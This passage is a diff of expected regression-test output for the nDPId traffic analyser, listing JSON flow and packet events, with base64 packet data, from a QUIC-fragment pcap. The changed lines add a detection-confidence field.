 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1621432876694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432876694,"pkt":"AAAAAAAAAAcAraZQCABFAAViGmJAAEARTcLAqP4L++wSxuaoAbsFTqV5w\/8AAB0IbOm6o+b7s18AAEU0LLQC1yXAWiYnG0IzhK2VYtXys8mZ62JD8wkhsWvqnkzFbhvt3QJvfuPuR1sirwI+KShnUrbM1afN6aEucT9hrS0klXGQkP\/sjbWxbRSVpPd+f9X5MHJS9Hz6kemhKetvXTyJqGbN1G75GC+zwvky4Qoa+1\/EIdMd\/MIuXCU84yBXwj+twRLahCznv3yroalrF474u7NubFW0jMWcRH5J+A15Xme108pRGv37O29qvyKdzOm1\/NNznL9yP2RLUgbmtwygArdZz610E2wne9tt8WxltfSjaavCs3J3wGNB7kwvqcFpV4kuTtBj8cRhDJ8UsAFET3J5wrdiOHvAkcai8b4dgSQNPHDp3xVf8Xxr5a3lZo4oeM2pSFKI4zOy\/gL3IOWrKEH5BRE0tivVe3HggMJPpzZub39IlYLUFGhw1FqGAvGU\/L7xouN\/GGzHYbjg9KBXpegMLxXi3ppGr4R3ZbEegXJV66wPYugPfdTLxj3R2ZAxcu5MSpStr5MG9ltk8lzwLtmx5YcbJbKyEMRaCF1iW\/dcIpEdw9mhALjKcmSqJOsabUpsYKoKUTDLiRb0OEMir5UbZUiQVy4\/7Sfjg8ICBXUxYfj0TnKlaJ+wlyizyGCVB0WjDtYmQo50PxvLRALC1oTClrCfpu+K5RTPrOVf3+YHiGNjoiEYVT3Ysn6ef85QtfRP8nysquU2HQ88cdBu1x51\/5RyV\/+DRSGX7VUOAssxQ1MRma0bjRn3Dmy0rmBgLMBljm\/VFeCUpmDEQk1q52vMrgRR1lJE4AiR7egIJ\/6ghIxt2OWtcRN3jJsaTUSy\/zR3IMutW13i9Gw+AVIamx3Vj3f2LmCwuEcU4XeICojezZ7vi0NbDJmYGkjSwtTh7b4ESpxisA62XYIfsFsU6JrkPXTQT01HZP1jD5W\/7lmQ0Uzgb\/2mciiqV+PLt4y8IbSi9MMFIn7Fr1j3biSlXPu\/RKPCVeZazwP4GHO\/RBVQpMem9Q8N3P8d2DHSrWjG21BATI\/t4zX6uTupPdTce\/pRl3wh6arawXv4rYaa734DQGVOXKuJAL3VUiEX4k2WKQ6rMy\/2mgtg8f52j\/tm9h2LXlahvO4wQoJ2w0aBRN8mS\/cj\/Ra3JQN+4\/oZNfyurOlap8hdr9uhFzS6jiSKCSEudsefNrvctv9D2s60pV3\/7RkKVVy2YmGu\/fMPAer+QSxevYYR\/AKkpcNjdJbkDD7YmHSguK9rnJzqbP\/etQrDxN0GrlpCWIXAdhL7Wfi2tYHcbnj8KVMmATRN+0400Z6WxauakXJuNv0JQTaVaubj\/PKuuq5K2vb0tCYbHDPd+MadAPo+JJ8pU1ZDa4KyOjlkd5AJbK5Q0frPvukJDpBDNImKfhDpKSebp8mS0bQbYQY0FjVILDcWSeoYGnRDjH4XJcz4fxZCkv0YvY6T1xDnsZGbGC4zJU59YxE5WYODQH3mhJYDZb\/R1Z23tx++rEKCl2Q7KLWqJ5ApuDmaONgp5W6ybOYwz0urwNxYZ8lWWON9dZHSxM5jOoeTSovDCyex8ryrdpEr1yHyEEgBjx97a\/VbuMDI9wE+07AAsKn1v0pSUT2Y4vUwGIFdflJgbjasGl8KWyMuibJCGP7tF5SXVICBAc\/QHntpbpYtsuJHF0\/RWuZ5yeLaxKHv5t92AvGJsO1Kn9KikspdEaOGD07Y\/IrmImcu4IELab4LYJw6sE0eqBRwufR9cgXtZLQQbDqd2TajaJSlfs8qSumGCJZU9e7j4K131s1OqQIPtVUm"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432876694,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00628{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1621432905483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432905483,"pkt":"AAAAAAAAAAUAtOBOCABFAAViNntAAEARSxrAqP4LXWSX3ZW7AbsFTtZExP8AAB0IShhVJvVFj04AAEU0bXBdseJ245uG4fwHC8m+6tqS\/v6gWT6TRuENAP9tPhydGDsgF7KG9PiuBNd6U4OZoDZDYxdNvgEXRnGpqok1G3cCYyBnmB+42zbaUcW6U0WH8uxsOi5\/mEnkpv0Euyn4vltnRK3e5h6tt2GHGaZNsy6oaivFwmgBfGYXqlFzvmiPzvJp0LRexpgDjU1i\/7Vx3NLfmf7PCWakVkQTn3Mv0hIdyp8NbWby75nFm5vd9qbf7rSRebZCqrG\/gNT3SMKZ9PYXe6zl6Or9B3VtV0CUQVHLUT2ZljaOp+wo2wp+zymYt6qEwhJmfIj1MPdkgXuV3gJi0KHCUAcVSQRFxSkySlYbKd6ChL8GI5FOjZ8QvdYKnwQM7\/z8AgfduUObnEfl6hZZ2npNR6FcP0WFzqQBRqRGO9wwKzFt\/XTgmkAPd3\/wF\/a5iP3PPQDPTiggyH1xpv0ciMP9WN7wbydFhtrLUcfgELiYllzto5jkyT0K6\/M5XWw3Kv1G4BMmIruFxnBZKQUoqA9d1oSjSc9wdZfqCt34KDErlg5RxTvxzlCxbSR1YL1ln0Lc5ooN49Vt0Q6U67rR+tWR3ESuIWUzLCixA\/08yk6CIflG592BY6gPW8Cbm\/dEQnktmUnnaHerrmQJ+oSjAV3xiVvlBT9XkcfS4WGAQSxeXxfXway\/cpuKTExCubwigm9g36DqjHLDwHWdQ6CDBwzPwE7JMioE0h5qzz7kgFtRTn3Dx0fN21mdCirtg9qB4hRCIkLgp9PkotTkEDbsPz4aPrVoVedFUeJh0cg3JwF0sNVAEJ\/svLXWTrK8yCxq3qPCAIv+qhZfntTMCSTOlv+m4\/SG6pP4\/xXexllpq4vN11z\/230fqh41BREXT6ToSYKiLPgIta9MKijhMUrhqLp\/H+6H5q5lyTMHqWsEsQNb9gmgb5bTrnpRQ66GI3I\/Eu6QRe6JQXxj0tdcpH1LILG1JY5awETdC9Gy\/ssWffqANToHPZNHsKgLSZ1Nr4vYsqiHrBBykgGu6do9vSxz86\/Q7Nfe09TEYnNYd\/kOxWDgAjPgINa9ldEyBy\/c1LwwfuQYBqjVd6qzuIvK08UzshDfAry1FSjTNf4Xhzv+C+kRHXoa7jBGnB6icP7W4jD\/KUJLbHASUFpcjtDotzShDZHUYL2umLhCdB5TlPKE75C7x9wNG7TVI9tJsWFBgyfIZUHuK2V6Iv1Xy+i0DPqZ33eKf2\/0cktp3L9oQQztf0yom9iQlAFOrjb0BYxuxSQsDAuCBTfuHuiEnBMg+uie7JClpFd8oxRzgLF2UmGs+bcAjRKlbO8KUqBVWyus6KeC+GY7NYnQOkEB79W\/LSs6F\/y3yumt9XaOjhKZsA1BY2GPva6DJ9bGm5lZVeWW5MqGFMwmbmEdGj7B2lfP6DGaxySHgfivVSWM5AP9dRouhItZWUMTYuA42yBFxC7yYUU5K2dZxoCQBpBD8hiq\/kMUMEM3CXwPlOYnLiDJ4+OLlI1CXf6o16idWwlO57uhDJqlkgqP5iNglZKDiDaLUKSczncTiHuKNaqGxKe+jsT2MHO9nT+g41OMRLOnPZdlHoF\/GerD0RU3bVnuaPA\/7hWpOovJjEYu0nZDxzelWy4hmTrQXIfWloeao6NvLIo0\/Yq0zpGecbJvwB4o4kud6kzKSyDmvDz4lmDhp7J+b+a+a4OXVg9LI3gcKi3B+a6ggFfUWsH3jytuH49v9jql4XnS3YfR4DGtKs1U+A54fAEg+9sHrLj7+fD3uJet9knr5KO1"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432905483,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1621432905490,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432905490,"pkt":"AAAAAAAAAAUAlUIhCABFAAViNn5AAEAROxbAqP4LqsRafrJUAbsFTm9IwP8AAB0IsTWhMbhJUaMAAEU0Gz3E4x\/7PJCbI+CzxViIeUiiyxN5gIybKCWDCC8MybuqrNIvL9Pc+KUdkIcv1Parf76zB\/TXo6yFx03Ggg9vnqr6bkGGsAil7g9byvv9gAZjNQMGSu2b\/WIj+O2UGwYR9Ze56oGlPtQ3fK8ScJ+YBFKT+cpojJQmaymD6Gl7O0M2IsyhuN\/z5MNvVeoQtlTGtwJwJF4t3CB3+LaplqunC8tjUfp86B9GZjRjxLI+vZiWX5JnbOLJMNt1qMf64QnBwt3u85Pa9y3sMgX4lS49\/gtIXTs4bG2nNuP5iZc9DQwpayCdOqbJxVUpt1Fl9lqfqkGDabD\/h21kbArS1JNUPCYt82JW2kdPr89gKelvwKxs4MSTRQcLucGHeSqa+vxitAXlW11buSsT2YEY4TaaN7WLCC6Y5OgIewLiKrBgAIDD1JgOLmJe0jh8CtrwC4u83uCHm2ZVbMl2zcjPFlgSm1Ay5QghKEobHUp9BoKLbGW0OMfnx\/vMYa29tA+ukDFJJVEkBFUnmO5PVGVBLdD\/qq5Vm3qeCHn7bH0JKdEAvXgh7drH4CTmvjpTCgzXInM88QbOwK\/8hBF9B0y\/tT2huASOzdsreHMYES8k0ynoTtTU\/Go7e+As+IjpMhtw+r\/xyPdBQWw34uc2UrITsPWB94yJD0ktCz9KUH5fj5j\/MTcB3+EW1+ja2Sj2nYyRiHaQ+PsYbGaz6wXCZf\/tEQta61UXPhInHqIOpnQp\/diA\/YXmtWKl13Ka\/nxH0\/283amVXk8g\/p5xQZLdYYbM1SRNChx+BZ5020iyk2PcohpEjNvyiSDmDjrsIgS+Zr+qK1KW+WNd8m7ZfukNh06oyt6uTkWtGfWfvcwkR3CbVTV9K1zZ3JVpadtBKHoVfeSxzUNB8QO3HY1xoBwUiGOqQMyedNultJ9KH4IhP5o5Kj0DYGUHyTaflltEhcSWiITyfwyOZfUVxdCe3WBfMRyjKG3hw9Ag1m0IdO+3+4Sai4t9HAV2dkZrH0YBb8TzQtijMzuOc\/UkBsPoIHkBGzeAvR\/LY9Vvx0FYUh5X9ZD3MIwp92rfZV5hsqNc3rsZmWPZbpmeAfYzTL3829e2Wo5suo7aDIt+YYCq602XYEuGWM+tC+iqjQVOxADDkiMVvc8A2HYsO3wOW+49aVFLGStxeuhQV5lyMKSoVc3s2H3N+yL2RhtSvdV+b0mpGnnhW\/vc7mC9x1sZNQDq1FvyWi6OgOdM6ikZBFhVxT+99VaccO1YRMkituNtiRsVhm75XQZqQj3SqqL7zi4YYwKWE27YtUcI5DX96iUTbNaIXKbJoRkVWEHi7xVpW0qoKbMqyaTsMaxe9oY9tVhw325iZUqJTscJGuYlireqNEe49UiKHrFD3pBUHCyEpSwijnx0RbAj6rwweNbjXSMbaikwVIiNvMIL5VCmZOW\/ZtxLPMa2yys2nECf\/Vuy3Ou\/9DnpSXaPhTvBFgWf28msqEADWXnHOxczzQxoYSRHSEzLrR2jTHxifPCTR9hSWy+JWnFXHJLcH7QJbBCrIdXrcgRQBgdnrkM4BVlslDUk6ZPisArQe+Rj5RV5jX3HYw7JzZSegmwQhkALBsMs6Mymiz0gK4lwsh2Az\/uP7GO8UcOQkp9ZEs6GaH9yS+2hlRtG0Haykp8Fzi0\/SkuRseswdA0H14gPSc\/5WFCyoI7Y18l0y18eYy1sFdl5G9h5zsIxr1Gxqhupt8DBAd46yPzEuBUgOukFiKNOskklsdcO5v54a8qPY1mJBX8XQWL5"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432905490,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1621432907578,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432907578,"pkt":"AAAAAAAAAAUAUmvlCABFAAViOItAAEARD\/\/AqP4LYvvLUamjAbsFTviww\/8AAB0IdEz2yPqFNEUAAEU01lkubHvVAeXsQ5sXGwZERrAsLetkvRSa9r94YrnlT\/RFyWgWZjc\/+m3X4BabWgtMfG2MrRlDeu83ayw7f1Rv29gQ1Fwf3qL9\/y5QL3cILj9wzX79jhfIBW7rk2S021YCCn4cPYvBdSyZo8hiLdDRqY342daZqWhur\/YwUIhfZdJAQA0xgKFAGLgZkHQQNo8iY7pDwNfTWCrPxPcVH\/XyhdL7AM63JNrgEEzMf\/9jsRjfxGAePPUm1\/8wwIq77\/+PVwZ2j3YBRiYZ0seAv7CvRMkkYVrxpAOSkaAOCWqoN0s5yzHmFyDcbv+feS4uFL5UXCfavdd82ZgTmlsjFiR+hG9t7chDZL56DXhZ5TLxZf3UYmIHnX6JZkUrLIVJZ6\/OVCfo3DHRQ4PJOh\/CzeVr8LoegDT5B8ULST3gZnAqDfI276pUF8whh8aVckRyaBeY2ZCBjMcnwLeLg7OKLQvK5wC5BJkNIi5J8oyjbOTedU60kHu3fE+53ZlWBZRS7HAIJQGXa4GEDkaQ5k4XnO\/xxxjpThDLvE8dUHcTQ9ovWlb8\/JSF0up6I6NgBtYGIn5XhNqx0EdEUtgLAzzPtcFSMuYYjicAs9S+W8GgyoFH7nZiOgJcvL3AdZ\/GXk38PSB357IxdJooYxNvjvQ+gKfGJQ5jvUMuu0oyiEO2+gYr9SeGcmLMhDdauhnvk0udsh4awocJv+zrEMXX8l2xSzHndbPtEGFu0slTz0a9mozr6y79gh8In5Bn2s23hBM4ZGcGhqvwp1y4\/CIp1v8EZ3CF\/c\/nf\/AnBeGNBGm\/vfaxi2\/dM2Rilztfd9EUjx6Uz0Q4WrIB5aEwh0AOzRhbK3NHQKo0V2nfc5lpb0UDc9+BrNHOqAdA4BUxqc32WdBMwB8nu8So3Ug4rrM\/JVLFz6\/kRNXUJZRpvlvWmmPwbhgJJtJv\/M89mXfU1kK+Y5ZzDEOWJFwuGE5EwyEXLqfAhuVfYr\/IGf\/dVORQAeJN2Jps3sJhqhEj1IkKjkFBWkkAkONz+gchb05T6MlwCM8C28gRq7Mb7CFBEn\/vYYqlEKnhwzKBeeBye41Vq0gbKM0JV9qRHQ7XKOsVwyIutepBP8jrECNHdwLaIEu+1zVrAN6yVIQ8\/oQq+VsbKPG9+CxCgvT5uKndWjk\/3klEO2lVttmkusFyP5l9gzCYwVOHLBsZ3xnkE2+m\/prV\/JheISUApwdWrKMEd\/078e9MXRkuX+dpNqT7a5dhlSXsO74abB1mrlTL2UcA2ek91eefqFvbEgNjkLzRgECot8CV3+VilYqrujsR+JjJ9wVO2ZRWW2y3ztaE6g21zSYVB6vxMaqYRnz72pD5b35k\/u8uTGE1pcJQr7C2oDFyU6xrQ8fc2olGaloqsNSa9zjm3tw\/aIkxpxphv2ISYW1zYIojgj\/1VCqJN2qkuGsMNJgJdPcqF3OzluCuyf9tY53umRYC\/2FFOugDxVHFd6F4iSNEQ3C3zvrpOLrWtwhbX3hkwUWpwIKllXL2Nq\/iK0AdLu5a1u7VIasXJSlmcKgX7VPPNflgTztWI0n6bh20EyUV6JmwylfymR7pRszlj27nJphDjd5FGRwMS2WMwNFJTxb+RT\/9S6rDmaFhFtes\/+ACWdpqhAKM5grfBOdhgmSQbu4voAVj9LPSU108aYASzXKDjwCDNx50fbMcWjuukzLgNuVnkky2tdFq8pWWnhoc+x1nhhOmxTLo9PFGk31LiQUA895pzmo+l2fTL008oeWJdzMT6HnN4Sq93hT2"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1621432925103,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621432925103,"pkt":"AAAAAAAAAAcAGj1jCABFAAViSZ9AAEAR2GnAqP4Lq7apF9WkAbsFTr9ryP8AAB0ImNfkZtNfpzsAAEU0Oj9RSuVXGBshDZ9GPJVbTKah5lq0FbzrD\/4QiXWxZYgS+EbUjCGL\/0WPsAmbxAc5pHPcwM09LAtmsRF0tGX2IcJO0mU4AICaJurVtqH6l7QnkS2mp\/1x4GkbuWDqNzt1vSNWb0duDucAhmzcDliKJUl+FhynNOZYpa37\/x3qQ2gUckEGtff22WZgICjdslGI9otsFCSq641M3T\/cnDTUDnywq\/5JBllUmTz3xSy7uOqdk\/GvmAxiKHI2qstlN50jgygWTjcEwibzi9GX45hbp55CvW6Vq07\/s78mWZPUaJolO7wmVEZvMjkKJwShrqatA1+fXdYi3Cg6UroeArW9\/giXBCgKk96t0LWj0Ye3aYHEguEIQQk+U1hIhhohBG7CyRY7KinfzxhHKYp4nxR0AoE08flCIJk27BdQVKCtwgdl1KEE6InkS58vcYsqRwl5mGQOqcdrW5vFut3SDANgBea80xgfodgrDqKTbcyZffoEiF+kb9ynHc1ezv0bIAV1PkzOj2qgqWsC5p\/fh\/Zzo8P2XZ8aLnTStcZ6bcklAv5uVNf+UFbiWmjv2tlpO14A6WkHj4ErxqRWGBEYotaldzMPFZWFiW2ioPVB0TG8QGhc95U+YN9bqrlIpzSi25dwaSTySv9VHstq4bM\/QvcvcMc0fH6fkzreAswa30NHgKmTHo6vyNHpVpxUy9B4ic+Or+cxEht9\/+WUAlkGWn97Q8YWdYVqIOE5mCXUm8qnxVNMIjkIhZGSoo3YxRavD7wdS8Fw1e+q3qydgTwhWjN0NEBx48heIuNQeY\/cE2hG6X8ielA1D3F3K53XZj+sSIoJGcY1F7o1jjWVmH8mOKr2btDy1dXnct+R\/pl4MyRkLClPx\/3ATniC4oYp8uNJ3B+NZdFcYjik5Sgeyx0mQaYCG27z65uob1zsx3rLGilfcXu8rawpdMaheJzkzO8EfJ0bPQG7F16gqR72nPqhJazpLH1wJnmzKMRebRRXMjGts\/Ri1mopASMG\/jbemX2+HOVqkYrPOJB4f5ST2JWfYMS9SdThVwfLGD1AwfsTLiumDKXR4Tg9xxWgAm+qvsbkRhOZ+FGfeL1PYau3Gyz7MiuqmvjBLY1U2K2xhSPscA4eL02HE+xDEr9eGwsucUqbbX+fy7xw+w59I9WXHzL9SjWsk7akH4tDqV3vDDFTrKT11Jy1Do1G\/mkcndHjXnmmMLfPsi8aPVfXNZIsbgrEqHINxT2H5oY4DI9on9u1XyO+WEYlRBbCj0\/iK09jSPGirK8Q36Lbin8pAshKEXfyzFJHclT4mOY4c7REOe77o1hD3cLQLCZ3KJ7lzwhO1fZz\/+5qiqK9KNuq+3D1\/Fbs5GLW+FqzDspdA+DHD3HVyqhGJSXI53Ms9iSliE6F6FFbgCwH3eJT9Ox0wN1